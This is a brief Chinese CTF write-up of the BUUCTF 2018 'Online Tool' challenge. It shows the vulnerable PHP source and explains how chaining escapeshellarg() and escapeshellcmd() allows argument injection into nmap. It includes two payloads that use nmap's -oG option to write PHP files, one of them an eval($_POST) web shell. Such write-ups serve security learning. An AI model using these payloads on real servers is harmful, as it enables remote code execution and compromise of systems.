https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
考查点:
利用escapeshellarg()+escapeshellcmd()
的两次转义,导致闭合单引号后即可执行任意参数,然后利用Nmap的-oG
参数写入shell
?host='<?php phpinfo();?> -oG 1.php '
?host='<?php eval($_POST["cmd"]);?> -oG shell.php '
PS:这里我有个疑问,网上看的题解里面好像都不能清楚的解释为什么?host='<?php eval($_POST["cmd"]);?> -oG shell.php '
这里最后的单引号的前面要加个空格,不太明白,有师傅清楚的话,麻烦评论区指点一下,谢谢